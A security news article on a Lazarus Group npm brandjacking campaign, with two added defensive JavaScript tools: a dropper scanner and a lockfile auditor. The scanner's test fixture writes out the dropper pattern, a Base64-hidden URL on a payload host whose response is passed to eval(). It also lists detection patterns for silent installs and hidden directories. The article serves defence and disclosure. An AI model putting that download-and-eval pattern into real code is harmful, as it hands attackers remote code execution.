Lazarus Group Launches npm Brandjacking Campaign to Target Developers

A recent npm campaign, attributed to North Korea’s Lazarus Group, has highlighted a new strategy in which attackers employ deceptive package names to infiltrate developers’ systems and software build environments. This tactic poses significant risks for organizations reliant on JavaScript tools, as many developers may unwittingly install these malicious packages.

According to Sonatype Security Research, dozens of malicious npm packages linked to this campaign have been identified, with some achieving as many as 500 downloads per week. These packages are crafted to mimic connections to trusted JavaScript projects, thereby increasing the likelihood that developers will inadvertently incorporate them into their workflows.

More Than Just npm Typosquatting

While traditional attacks often rely on typosquatting (misspellings of a real package name), Sonatype’s findings reveal that this campaign employs a more sophisticated method known as brandjacking: the package name borrows the brand of a trusted project rather than misspelling it. These tactics include the use of modified suffixes, incorporation of well-known project names, and version imitation. Researchers have noted names designed to resemble popular libraries such as Buffer, Chai, React, Express, JWT, and Webpack.

This naming approach is particularly effective in the npm ecosystem, which is abundant with numerous small libraries and plugins. For instance, a package labeled buffer-utilities could easily be mistaken for a legitimate enhancement to the widely utilized buffer package, despite having no authentic affiliation with it.

Sonatype’s analysis of buffer-utilities revealed that it not only copied the README instructions of the genuine buffer library but also functioned as a malicious dropper. Upon installation, it decoded Base64-encoded URLs, retrieved remote content from www.jsonkeeper.com, and executed the fetched code using the eval() function.

This pattern was observed in other packages associated with the same Lazarus Group activity. Notably, the use of www.jsonkeeper.com has been documented in previously intercepted Lazarus packages, indicating a broader strategy of relying on this service for malicious payload hosting.
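The dropper traits described above (a Base64-encoded URL, a fetch from www.jsonkeeper.com, and eval() over the downloaded text) can be checked for statically on a quarantined copy of a package, for example the tarball produced by npm pack, without ever running the package. The scanner below is an added example written for this article; it is not Sonatype’s tooling and not code from the campaign. Both sample sources, the placeholder path under www.jsonkeeper.com, and the indicator list are constructed here for illustration.

```javascript
// Added example: static indicator scan for the dropper behaviour the report
// describes. Run it over package source text obtained from `npm pack` or a
// registry mirror; never install or execute the package to analyse it.

// A run of Base64 alphabet characters long enough to hide a URL.
const BASE64_RUN = /[A-Za-z0-9+/]{16,}={0,2}/g;

// Decode a candidate Base64 run; return the text only if it looks like an
// http(s) URL made of printable ASCII, otherwise null.
function decodeIfUrl(token) {
  const text = Buffer.from(token, 'base64').toString('utf8');
  return /^https?:\/\/[\x21-\x7e]+$/.test(text) ? text : null;
}

// Scan one source file and return a list of { kind, value } findings.
// knownHosts defaults to the payload host named in the report.
function scanSource(source, knownHosts = ['www.jsonkeeper.com']) {
  const findings = [];

  // 1. Base64 strings that decode to URLs (hidden download locations).
  for (const m of source.matchAll(BASE64_RUN)) {
    const url = decodeIfUrl(m[0]);
    if (url) findings.push({ kind: 'base64-url', value: url });
  }

  // 2. Dynamic code execution over data that may have been fetched.
  if (/\beval\s*\(/.test(source)) findings.push({ kind: 'eval', value: 'eval() call' });
  if (/\bnew\s+Function\s*\(/.test(source)) findings.push({ kind: 'eval', value: 'new Function()' });

  // 3. Known payload hosts, either in clear text or inside a decoded URL.
  const hosts = new Set();
  for (const h of knownHosts) if (source.includes(h)) hosts.add(h);
  for (const f of findings) {
    if (f.kind !== 'base64-url') continue;
    try {
      const h = new URL(f.value).hostname;
      if (knownHosts.includes(h)) hosts.add(h);
    } catch {
      // not a parseable URL; ignore
    }
  }
  for (const h of hosts) findings.push({ kind: 'known-host', value: h });

  // 4. Other traits named in the report: a hidden .vscode directory under the
  //    home folder and a silent npm install of a second-stage package.
  if (/\.vscode/.test(source) && /homedir\s*\(/.test(source)) {
    findings.push({ kind: 'hidden-dir', value: '.vscode under home directory' });
  }
  if (/npm\s+install\s+--silent/.test(source)) {
    findings.push({ kind: 'silent-install', value: 'npm install --silent' });
  }
  return findings;
}

// Dropper-like means: a hidden URL together with eval, or a known payload host.
function isDropperLike(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  return (kinds.has('base64-url') && kinds.has('eval')) || kinds.has('known-host');
}

// Constructed fixtures (not real package code). The path segment after the
// host is a placeholder, not an actual payload location.
const SAMPLE_URL = 'https://www.jsonkeeper.com/b/PLACEHOLDER';
const SAMPLE_SOURCE = `
const https = require('https');
const u = Buffer.from('${Buffer.from(SAMPLE_URL).toString('base64')}', 'base64').toString();
https.get(u, (r) => { let d = ''; r.on('data', (c) => (d += c)); r.on('end', () => eval(d)); });
`;
const BENIGN_SOURCE = `
module.exports = function concatBuffers(list) { return Buffer.concat(list); };
`;

console.log('sample :', JSON.stringify(scanSource(SAMPLE_SOURCE)), 'dropper-like =', isDropperLike(scanSource(SAMPLE_SOURCE)));
console.log('benign :', JSON.stringify(scanSource(BENIGN_SOURCE)), 'dropper-like =', isDropperLike(scanSource(BENIGN_SOURCE)));
```

The Base64 check deliberately decodes only runs that turn into a clean http(s) URL, so ordinary long identifiers and real Base64 data (icons, test vectors) do not trigger it; eval() on its own is only a weak signal and is escalated to dropper-like only when paired with a hidden URL or a known payload host.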

Following the initial phase of the malware, a Node.js backdoor can be deployed, gathering essential system information such as the hostname, username, operating system, home directory, and process arguments. This data is subsequently sent back to the attackers, allowing for further commands and actions to be executed remotely.

The malware can also generate a hidden .vscode directory within the user’s home folder, download additional components, and execute JavaScript controlled by the attacker as a background process. Sonatype has indicated that this package is capable of fetching an additional payload named f.js along with a package.json file, executing npm install --silent before running the payload as well.

These behaviors enable attackers to maintain access to compromised systems and to refresh malicious files over time. Sonatype has reported an update mechanism that allows the payload to reconnect with command and control servers, check for newer versions, and replace local files, thus extending the potential for long-term disruptions.

The implications of this campaign show why npm remains an attractive target for advanced threat actors. Developers often select packages based on familiarity and convenience, making the JavaScript and npm ecosystems particularly vulnerable to such deceptive tactics. The association with the Lazarus Group adds further significance, as this group, known for its involvement in financial heists and espionage, is now clearly focusing on gaining access to developer environments and enterprise infrastructure.

Protect Your Devices

Organizations that installed version 1.0.0 of buffer-utilities, or any packages flagged under the Sonatype identifier sonatype-2026-003558, are strongly advised to remove them and conduct a thorough review of their systems for signs of compromise. Simply deleting the package may not suffice, particularly if subsequent malicious payloads have already been activated.

In addition, administrators should monitor for any network traffic linked to www.jsonkeeper.com, as well as any irregular command and control communications. It’s crucial to investigate unexpected .vscode directories, unusual Node.js processes, and any unauthorized credential access from development workstations or build systems to mitigate the risks posed by this ongoing threat.
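A first remediation step is to audit lockfiles for the package and version named above, and, because the naming trick in the buffer-utilities example works on any well-known brand, to list every dependency whose name is a known project name plus a generic suffix, or that embeds a known project name, for manual review. The audit below is an added example written for this article (not Sonatype’s tooling); it assumes the lockfileVersion 3 layout of package-lock.json, where dependencies appear under a "packages" map keyed by their node_modules path. The sample lockfile, the allowlist of legitimate brand-sharing packages, and the suffix list are constructed for illustration; the flagged package, version and Sonatype identifier are the ones the article names.

```javascript
// Added example: audit a package-lock.json (lockfileVersion 3 layout assumed)
// for the package named in the report and for brandjacking-style names.

// Package and version named in the report, with Sonatype's identifier.
const FLAGGED = [
  { name: 'buffer-utilities', version: '1.0.0', id: 'sonatype-2026-003558' },
];

// Well-known projects whose names the report says were imitated.
const KNOWN_BRANDS = ['buffer', 'chai', 'react', 'express', 'jwt', 'webpack'];

// Constructed allowlist of legitimate packages that share a brand name;
// extend it from your own vetted dependency inventory.
const ALLOWLIST = new Set(['react-dom', 'webpack-cli', 'express-session', 'jsonwebtoken']);

// Generic suffixes that make a borrowed brand look like an official add-on.
const SUSPECT_SUFFIX = /^(.+?)-(utils?|utilities|helpers?|tools?|plugin|extra|core|lite|js)$/;

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"
function packageName(lockKey) {
  const marker = 'node_modules/';
  const idx = lockKey.lastIndexOf(marker);
  return idx === -1 ? lockKey : lockKey.slice(idx + marker.length);
}

// Return a human-readable reason if the name looks brandjacked, else null.
function brandjackReason(name) {
  if (ALLOWLIST.has(name) || KNOWN_BRANDS.includes(name)) return null;
  const base = name.includes('/') ? name.split('/').pop() : name; // strip @scope/
  const m = SUSPECT_SUFFIX.exec(base);
  if (m && KNOWN_BRANDS.includes(m[1])) return `"${m[1]}" plus generic suffix "-${m[2]}"`;
  const tokens = base.split(/[-_.]/);
  for (const brand of KNOWN_BRANDS) {
    if (tokens.includes(brand)) return `contains well-known name "${brand}"`;
  }
  return null;
}

// Accepts the parsed lockfile object or its JSON text. Returns one entry per
// dependency that should be removed (exact match) or reviewed (heuristic).
function auditLockfile(lockJson) {
  const lock = typeof lockJson === 'string' ? JSON.parse(lockJson) : lockJson;
  const results = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    if (key === '') continue; // the root project itself
    const name = packageName(key);
    const version = entry.version;
    const hit = FLAGGED.find((f) => f.name === name && f.version === version);
    if (hit) {
      results.push({ name, version, severity: 'remove', reason: `matches ${hit.id}` });
      continue;
    }
    const reason = brandjackReason(name);
    if (reason) results.push({ name, version, severity: 'review', reason });
  }
  return results;
}

// Constructed sample lockfile (versions are illustrative, not a real project).
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '0.1.0' },
    'node_modules/buffer': { version: '6.0.3' },
    'node_modules/buffer-utilities': { version: '1.0.0' },
    'node_modules/react-dom': { version: '18.2.0' },
    'node_modules/chai-helpers': { version: '0.0.2' },
    'node_modules/lodash': { version: '4.17.21' },
  },
};

for (const r of auditLockfile(SAMPLE_LOCK)) {
  console.log(`${r.severity.toUpperCase().padEnd(7)} ${r.name}@${r.version}: ${r.reason}`);
}
```

A "remove" result is the actionable one; "review" results are expected to include legitimate packages until the allowlist reflects your inventory, which is the point: the decision about whether a brand-named package really belongs to the project it resembles has to be made by a person, not inferred from the name.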
